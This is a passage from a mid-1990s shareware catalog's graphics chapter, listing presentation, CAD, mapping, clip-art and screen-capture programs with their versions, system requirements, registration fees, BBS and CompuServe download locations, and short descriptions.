a 2400 baud modem) + Description: + An entertaining mouse-driven program which lets the user create + and print replicas of "vanity" license plates. User can even + include personalized license plate "mounting bracket" around + the plate. WYSIWYG screen interface. Configurable on-screen + colors. Plates will include the state "slogan" at the bottom. + Will output to a wide variety of printers, even color printers. + Also output to PCX file. + + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 65. + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 613. + + + 14.4 Presentation graphics + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: BitMapZ For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.40 (11-01-95) + Needs: IBM 80386, Windows 3.0 or better. 330k RAM; CGA monitor; + Dual 720k floppy drives; Mouse. + Registration fee: $14.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; bonus graphics; all + ASP-wide offers (see page 6); disks of other shareware; + + Chapter 14, "Graphics" 490 + + + + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: BMPZW240.ZIP on BBSs (call 317-784-2147 to download it + at no charge); BMPZ4W.ZIP on CompuServe in CIS:UNICORN forum + LIBrary 18 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Designed to help you create slide shows using BMPs. It gives + you the control over the slide's background colour, duration of + the slide, and lets you add a clear title to each slide, making + them easier to find. Now you can have your PC help with + presentations, relaxation, teaching or just give yourself a + visual break anytime you need it. The program is also useful + for displays, where you can have passers by examine your + product while you are away or busy. Easy to use and fun to + watch! + + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 274. + + Product: Crowndale Tales : ESCAPE! + Multimedia fable. See full description on page 614. + + Product: DeltaCad + CAD program. See full description on page 493. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 480. + + Product: FF Graphics Conversion Utility + Convert metafiles and icons to bitmaps. See full description + on page 508. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 313. + + Product: PageFocus + A productivity program for everyday use. See full description + on page 482. + + Chapter 14, "Graphics" 491 + + + + Product: Poster + Author: PosterSW (Robert Bedoll), 206-848-0467 + Version: 2.3 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe, mail support; + bonus templates; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. Bonus borders. + Look for: availability unknown on BBSs; POSTER23.ZIP on + CompuServe in CIS:WINAV forum LIBrary 0 (or contact userID + 75754,2174 for assistance). + SWREG#: 4249 + PsL#: 14375 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + The popular Windows shareware package for making big posters, + signs, and banners. Text and graphics are enlarged up to 9x9 + feet, and tiled over multiple pages. Great for presentations + for work, school, clubs, meetings, etc. Supports all true-type + and ATM fonts. Imports graphics from bmp and wmf files, the + clipboard, and OLE applications. Includes a full set of drawing + tools (circle, rectangle, etc.) Supports special effects for + text (3D, outline, etc.) Supports color. Includes borders. + + + Product: SmartDraw + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: SmartDraw 95 + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + 14.4.1 Animation applications + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 65. + + Chapter 14, "Graphics" 492 + + + + Product: StarFlic + Author: TRIUS, Inc. (David Schulz/Paris Karahalios), + 508-794-9377 + Version: 1.2 (04-14-94) + Needs: IBM PC, DOS 3.2 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + EMS memory. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: SFLIC.EXE on BBSs; SFLIC.EXE on CompuServe in CIS:PCAPP + forum LIBrary 10 (or contact userID 71333,103 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A flic file (FLI) compiler and player program. Create flic + files from True Vision TGA, or 16-color PCX image files. Play + FLI and basic FLC files compiled by other programs. User + specified anti-aliasing and image reduction using a 3x3 + Bartlett filter. Frame delay, gray scale color mapping, color + intensity averaging, VESA 256-color support, and more... + + + 14.5 CAD/CAM applications + + See also: Engineering; Graphics, Software tools & add-ins, For + AutoCAD. + + Chapter 14, "Graphics" 493 + + + + Product: DeltaCad + Author: Midnight Software, Inc., 206-361-0882 + Version: 1.1 (12-12-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Mouse. + Registration fee: $49.95 (add $4.95 for shipping to U.S. + addresses) (add $9.95 for shipping to Canadian addresses) (add + $9.95 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of fax, CompuServe, mail support; all ASP-wide offers + (see page 6). + Look for: DTCAD11.ZIP on BBSs; DTCAD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 102562,1411 for + assistance); DTCAD11.ZIP on GEnie in 0 forum LIBrary 0. + SWREG#: 8869 + PsL#: 14345 + Download size: 1445k (about 107 minutes with a 2400 baud modem) + Description: + A powerful, easy to learn, Computer Aided Design (CAD) program. + It can produce accurately scaled drawings, or just pretty + pictures to paste into your favorite word processor, DeltaCad + can be used for Drafting, House plans, Decks, Business Cards, + Forms, Signs, Labels, Maps, Flow Charts, Home or School + Projects, etc. A true 32-bit program compatible with Windows, + Windows NT, or Windows 95. + + + Product: DRAFT CHOICE + Author: TRIUS, Inc. (David Schulz/Paris Karahalios), + 508-794-9377 + Version: 2.00e (01-06-94) + Needs: IBM PC, DOS 3.2 or better. 412k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; HP LaserJet printer; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; Plotter; XMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + + Chapter 14, "Graphics" 494 + + + + return policy; bonus utilities; bonus fonts; discounts on other + products; discounts on upgrades. Bonus symbol libraries. + Look for: DC20E.ZIP on BBSs (call 617-354-2505 to download it at + no charge); DC.ZIP on CompuServe in CIS:PCAPP forum LIBrary 10 + (or contact userID 71333,103 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Vector based, affordable CAD program with over 200 drawing, + viewing and editing commands. Mouse and keyboard operation. + 9-pin, 24-pin, HP LaserJet/DeskJet, PostScript and HP plotter + support. Auto-dimensioning, 256 layers, English and metric + units, auto-scaling, powerful floating point zoom, symbol + library support, animation, on-line calculator, parametric + function generator, EMS and virtual memory support, 3-D type + volume rendering, parallel, vertical, tangent modes, and much + more... + + + Product: GammaCAD PRO + Author: Gamma Software, 970-490-2928 + Version: 2.02 (03-06-96) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 2-month limited return policy; discounts on + upgrades. + Look for: availability unknown on BBSs; GCADP.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 20 (or contact userID 73737,1721 + for assistance). + SWREG#: 6911 + Download size: 920k (about 69 minutes with a 2400 baud modem) + Description: + A full featured CAD program in an easy to use package. Create + floor plans, maps, graphs, charts, landscapes, circuit + diagrams, technical drawings, labels and much more. On-line + tutorials and examples get you up and running in no time. DXF + import/export capabilities allow you to transfer drawings + between GammaCAD and other CAD programs. Copy/paste drawings + into your word processor. Features include: symbol libraries, + grids, element snaps, automatic page setup, print and plot. + + Chapter 14, "Graphics" 495 + + + + Product: Home Plan + Author: Home Plan (Chuck Herndon), 209-754-4891 + Version: 2.7 (11-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, + CompuServe, GEnie, mail support; bonus utilities; discounts on + other products. + Look for: HOME27.ZIP on BBSs; HOME27.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (or contact userID 71321,167 for + assistance); HOME27.EXE on GEnie in IBMPC forum LIBrary 15 (or + contact userID C.HERNDON for assistance). + SWREG#: 388 + Download size: 134k (about ten minutes with a 2400 baud modem) + Description: + Draw, save & print house plans. Easy to learn & use. + * Move, copy, resize, mirror + * Undo, redo, clone + * Automatic dimensioning, supports metric + * Optionally shows framing (studs/joists/etc.) + * Rectangles, circles, Arcs, etc. + * Delete screen areas + * Selectable line styles + * On-screen odometers, protractor + * Automatic door insertion + * Variable width walls + * Print screen size or 1/8" per ft scale + * Insert pre-drawn furniture/appliances + * Sq ft calculation + + + Product: Layout + Office layout and equipment inventory. See full description on + page 273. + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 347. + + Chapter 14, "Graphics" 496 + + + + Product: PC-Draft-CAD + Author: Natural Software (Michael Allen), 708-377-7320 + Version: 3.06g (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $65.00 (Canadian dollars) (add $91.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 6); disks of other shareware. + Look for: PCDCAD*.ZIP on BBSs (multiple files); PCCAD*.EX on + CompuServe in CIS:PCAPP forum LIBrary 10 (multiple files) (or + contact userID 70047,744 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A full featured CAD system with features found in expensive + commercial CAD systems. Automatic dimensions, unlimited layers, + named objects in group libraries, context sensitive help, print + on plotters, dot-matrix, lasers. Exact scale output in feet- + inches, metric, decimal feet or inches. Keyboard macros. Import + WordPerfect .WPG, .DXF; export .WPG, .GEM, ASCII or HPGL + formats. Includes fonts, sample drawings, symbol libraries. + spline curves, area calc. Virtual memory. + + + Product: PrintGF + Image printer. See full description on page 77. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Chapter 14, "Graphics" 497 + + + + Product: ProtoCAD 3D + Author: TRIUS, Inc. (David Schulz/Paris Karahalios), + 508-794-9377 + Version: 2.00 (04-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Dual + 720k floppy drives; HP LaserJet printer; Mouse; Plotter; Epson + printer; EMS memory. + Strongly recommended: Hard disk. + Registration fee: $59.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; + discounts on other products; discounts on upgrades. + Look for: PC3D20.ZIP on BBSs; PCAD3D.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (or contact userID 71333,103 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Powerful 3-Dimensional CAD/rendering program. Windows-like, on + screen toolbar; dynamic trackball viewpoint rotation; + perspective, isometric, and plane views; realistic light source + and surface shading; user defined color mixing; 32 layers; 3D + drawing tools (cone, block, mesh, prism...); powerful extrude, + revolve, sweep, skin and patch 3D commands, full compliment of + editing commands (Copy, Move, Scale...); TGA, POV, PCX output; + VESA support; more... + + + Product: TommySoftware CAD/DRAW + The CAD shareware standard. See full description on page 483. + + Product: TommySoftware Tek Illustrator + Most powerful graphics application. See full description on + page 484. + + Product: Top Draw + Powerful, fast, and easy drawing program. See full description + on page 484. + + Chapter 14, "Graphics" 498 + + + + 14.5.1 Vector/ray tracing + + Product: REALIZE + Author: Transcendental Technologies + Version: 1.0 (09-21-94) + Needs: IBM PC, DOS 5.0 or better. VGA monitor; Hard disk. POV + 2.0 or later (freeware raytracer). + Strongly recommended: AutoCad or other .DXF file generator. + Registration fee: $50.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; bonus utilities; bonus data; bonus graphics; all + ASP-wide offers (see page 6). + Look for: REALIZE.ZIP on BBSs. + Download size: 272k (about 20 minutes with a 2400 baud modem) + Description: + A full-featured, one-step .DXF-to-POV raytracer description + file format converter. It converts all 3D entities and extruded + 2D entities to a ready-to-trace package. Fully converts simple + and nested blocks as well as the 256 standard colors. Full + control of smoothing, texturing, etc. is implemented via a + "directive file". Other features: automatic generation of + floors,skies,and lighting; infinitely smooth shapes; bit maps; + CSG; 2D effects; others. + + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 483. + + + 14.6 Business applications + + See also: Business. + + Product: DeltaCad + CAD program. See full description on page 492. + + Chapter 14, "Graphics" 499 + + + + Product: EXPRESSGRAPH + Author: Expressware Corporation, 206-788-0932 + Version: 1.05 (05-01-92) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; CGA monitor; Epson + printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: EGRAF1.ZIP on BBSs (call 206-788-4008 to download it at + no charge); EGRAF1.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 10 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + The size of the graph can be adjusted by changing the height + and width. Horizontal and vertical grids can easily be turned + on or off. The scaling factor can be controlled. Graph up to + 16 groups of 52 numbers each using 16 different fill patterns. + Line graphs can be made with or without symbols. Bar charts + can be regular, overlapped, stacked, percentage or three + dimensional. Pie charts can be uncut, exploded or separated. + Import data from other programs. + + + Product: SmartDraw + Author: SmartDraw Software Inc., 619-549-0314 + Version: 2.07 (04-08-96) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $35.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, mail support; 1-month return policy; + bonus graphics; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: SMRTDRW.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SMRTDR.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 15 (or contact userID 75334,3714 for assistance). + SWREG#: 4133 + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Easy-to-use program for Windows that lets anyone draw great + looking diagrams, flowcharts, flyers, maps, and other business + graphics. Better value and easier to use than Visio, more + powerful than SnapGrafx, it provides drag & drop drawing, + automatic connecting lines between shapes, built-in design + styles and shape libraries. Works with Microsoft Office and + other programs as an OLE Server. You don't have to be an artist + to get professional results when you use this. Winner Best + Graphics Program, 1995. + + Chapter 14, "Graphics" 500 + + + + Product: SmartDraw 95 + Author: SmartDraw Software Inc., 619-549-0314 + Version: 2.07 (04-08-96) + Needs: IBM 80386, Windows 95 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $49.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, mail support; 1-month return policy; + bonus graphics; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: SMRTDRW.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SDRW95.ZIP on CompuServe in WIN:PROD forum + LIBrary 15 (or contact userID 75334,3714 for assistance). + SWREG#: 4134 + Download size: 650k (about 48 minutes with a 2400 baud modem) + Description: + Easy-to-use program for Win 95 that lets anyone draw great + looking diagrams, flowcharts, flyers, maps, and other business + graphics. Better value and easier to use than Visio, more + powerful than SnapGrafx, it provides drag & drop drawing, + automatic connecting lines between shapes, built-in design + styles and shape libraries. Works with Microsoft Office and + other programs as an OLE Server. You don't have to be an artist + to get professional results when you use this. Winner Best + Graphics Program, 1995. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 290. + + 14.6.1 OCR applications + + Product: WinOCR + Author: SoftTech, 071-359-0405 + Version: 2.0b (09-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; VGA + monitor; Hard disk. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: WINOCR.ZIP on BBSs; WINOCR.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 100116,3254 for + assistance). + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + An Optical Character Recognition program. It works with bitmaps + produced using low cost hand-held scanners and is intended to + provide an effective method of data entry for programmers and + others who require OCR. + + Chapter 14, "Graphics" 501 + + + + 14.6.2 Mapping/cartography + + See also: Data, Mapping data; Engineering, Surveying & + cartography. + + Product: Landscape Explorer + Author: WoolleySoft, 0786-825406 + Version: 3.01 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $65.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; bonus templates; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: availability unknown on BBSs; LAND*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 100332,2104 + for assistance). + SWREG#: 2099 + PsL#: 11239 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A 3D landscape viewer/GIS application for Windows. Can import + data from digital files or scanned map images to create 3D + models of landscape surfaces. These can be viewed from any + position and drawn in many different schemes such as Summer and + Winter colours, GIS data mapping and wire frame. Supports USGS + DEM 7.5' and UK OS NTF LandRanger file formats. + + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 347. + + Product: MAPIT + Author: Allison Software (John B. Allison), 412-727-2198 + Version: 1.4 (04-15-94) + Needs: IBM AT (80286), DOS 3.3 or better. 512k RAM; EGA monitor; + Hard disk; Mouse; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; + Plotter; XMS memory; math coprocessor. + Registration fee: $39.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, CompuServe, mail support; royalty-free runtime + license; + Look for: MAPIT14*.* on BBSs (multiple files); MAPIT*.* on + CompuServe in CIS:PCAPP forum LIBrary 7 (multiple files) (or + contact userID 72600,1200 for assistance). + Download size: 912k (about 68 minutes with a 2400 baud modem) + Description: + An integrated world mapping system of amazing detail which lets + you create customized maps for work, shool, or fun. + + Chapter 14, "Graphics" 502 + + + + * print detailed, professional-quality customized maps + * merge maps with word processing documents + * record and plot GPS data + * add your own detail with 100 foot precission + * measure distances, calculate azimuth angles, and plot + great circles and range curves with areas + * see the day and time anywhere in the world + * zoom to any level of detail + + + Product: TommySoftware Tek Illustrator + Most powerful graphics application. See full description on + page 484. + + Product: VERSAMAP + Author: Charles H. Culberson, 302-731-0694 + Version: 1.51 (11-15-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; bonus data; bonus fonts. + Look for: VMAP151.ZIP on BBSs (call 916-327-1208 to download it + at no charge); VMAP15.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70511,3134 for assistance). + SWREG#: 3020 + Download size: 331k (about 25 minutes with a 2400 baud modem) + Description: + Draws outline maps on 14 map projections. Print maps on + printer; or export as PCX, CGM, DXF, PIC, ASCII files. Add + text to maps. Maps contain new countries formed from USSR and + Yugoslavia. Plot World Data Bank II and USGS Digital Line Graph + data. Plot your own data in simple ASCII format. New + features: UTM projection, DXF output, display labels beside + points; plot geographic features in different colors from one + input file; circle symbol. + + + 14.7 Ready-made graphic images + + See also: Data, Mapping data. + + 14.7.1 BMP images + + Product: GTI Desktop+ + Enhancement/customization utilities. See full description on + page 115. + + Chapter 14, "Graphics" 503 + + + + Product: Kid's Art + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.1 (09-20-94) + Needs: IBM PC, DOS 2.11 or better. Ability to display or print + BMP images. + Strongly recommended: VGA monitor. + Registration fee: $0.00 + Registration benefits: + Look for: KDSART11.ZIP on BBSs; KDSART.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Twenty children's drawings converted to graphics files. BMP + format (16-color bitmapped) suitable for WIndows wallpaper and + other BMP uses. Not great art, but childlike, could be fun. + Best in color. + + + 14.7.2 PCX images + + Product: Kid's Art + Children's artwork. See full description on page 502. + + 14.7.3 WPG images + + Product: Graphcat/DOS Clip Art Cataloger [***] + ClipArt cataloger for WordPerfect 6.x/5.1/DOS. See full + description on page 210. + + Product: Graphcat/Win Clip Art Cataloger [***] + Graphcat clip art cataloger for WPWin7/61/52. See full + description on page 211. + + 14.7.4 For adults only + + Product: Swimsuit + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.1 (09-15-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; bonus utilities; bonus data; + bonus graphics; all ASP-wide offers (see page 6); disks of + + Chapter 14, "Graphics" 504 + + + + other shareware; discounts on other products; discounts on + upgrades. + Look for: availability unknown on BBSs; SWIM.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 7564 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Lovely women pose for glamour photographer Len Kaltman and now + his best images are available as Winzle puzzles. Extremely + flexible: Save puzzles, solution hints, music, sound effects, + simple mouse interface, and much more! + + This version contains no nudity. Registered version does + contain nudity, and is available only to adults 18 and over. + Supports any windows graphics mode, adapting as you switch + displays. + + + 14.7.5 Other formats + + Product: Classic Phantoms Screen Saver + 256-color screen saver featuring F4 fighter. See full + description on page 62. + + Product: Crowndale Tales : ESCAPE! + Multimedia fable. See full description on page 614. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 478. + + + 14.8 Utilities + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 87. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 478. + + 14.8.1 Cataloging tools + + See also: Utilities, File utilities, File sorting & conversion. + + Product: Docudex Document Imaging + Document imaging with powerful query system. See full + description on page 196. + + Product: Docuthek Document Imaging + Document imaging with powerful query system. See full + description on page 196. + + Chapter 14, "Graphics" 505 + + + + Product: Graphcat/DOS Clip Art Cataloger [***] + ClipArt cataloger for WordPerfect 6.x/5.1/DOS. See full + description on page 210. + + Product: Graphcat/Win Clip Art Cataloger [***] + Graphcat clip art cataloger for WPWin7/61/52. See full + description on page 211. + + Product: Jasc Media Center + Author: JASC, Inc., 612-930-9171 + Version: 2.02 (07-13-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. + Strongly recommended: Mouse; sound card. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; bonus graphics; discounts on upgrades. + Look for: MC202.ZIP on BBSs (call 612-930-3516 to download it at + no charge); MC.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4493 + Download size: 875k (about 65 minutes with a 2400 baud modem) + Description: + A Windows program for multimedia file management and + manipulation. Organize your multimedia files into albums of + thumbnails. Catalog, search, sort by keyword, comment, or file + properties. View files using the powerful slide show feature. + Full file manipulation capabilities from within the program. + Print high quality contact sheets. Support for over 35 file + formats, removable disks, and CD Roms. + + + 14.8.2 Graphic screen capture + + See also: Utilities, Hardware utilities, Screen, Screen + capture. + + Product: Capbuf + TSR captures text screens to disk. See full description on + page 68. + + Product: ClipMate for Windows + Clipboard utility - holds multiple items. See full description + on page 167. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 409. + + Chapter 14, "Graphics" 506 + + + + Product: Paint Shop + Image displayer, converter, editor. scrn cap. See full + description on page 477. + + Product: Paint Shop Pro + Complete painting image creation editing tool. See full + description on page 485. + + Product: Professional Capture Systems + Author: JASC, Inc., 612-930-9171 + Version: 2.0 (01-26-95) + Needs: IBM AT (80286), DOS 3.3 or better. VGA monitor; Hard + disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; discounts on upgrades. + Look for: PCS20.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PCS.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + A combination of both Windows and DOS programs that will + simplify screen capturing. The Windows program allows for the + capturing a defined area, full screen, window, or client area. + Captures can be sent to the clipboard, printer and disk. + Numerous image formats supported. The DOS program will capture + standard and extended VGA text modes and standard VGA graphics + modes. Captures are saved to PCX or BMP files. + + + Product: WinCap+ + Author: The CodeWorks+ Ltd. (David Barratt,) + Version: 1.00 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: WCP*.ZIP on BBSs; WCP.ZIP on CompuServe in CIS:DTPFORUM + forum LIBrary 0 (or contact userID 100571,3124 for assistance). + SWREG#: 4939 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A powerful bitmap viewer/printer/capture utility for Windows + (3.1). Capture a complete window, or any part of a window, then + print, save or copy it to the clipboard. Capture using a hot- + key or by pointing and clicking. Capture dropped down sub-menus + & combo/list boxes, zoom images, 16 and 256 colour supported. + An ideal tool for anyone preparing any kind of documentation + that requires an image of a window. Detailed on-line help is + provided. + + Chapter 14, "Graphics" 507 + + + + Product: WinCopy Screen Capoture + Author: Informatik Inc., 610.640.0339 + Version: 1.40 (12-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; WINCPY.ZIP on CompuServe + in CIS:WINAV forum LIBrary 7 (or contact userID 76534,1166 for + assistance). + SWREG#: 7573 + Download size: 214k (about 16 minutes with a 2400 baud modem) + Description: + Screen capture utility. Capture save and print. Supports 10 + graphics formats, including GIF, TIF, JPEG, etc. Easy to use. + + + 14.8.3 Graphic print screen + + See also: Utilities, Printer utilities. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 69. + + Product: WinCap+ + Powerful Windows(3.1) screen capture utility. See full + description on page 506. + + Product: WinCopy Screen Capoture + Screen Capture Utility. See full description on page 506. + + 14.8.4 File format translators + + Product: FF Graphics Conversion Utility + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.1 (12-20-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide 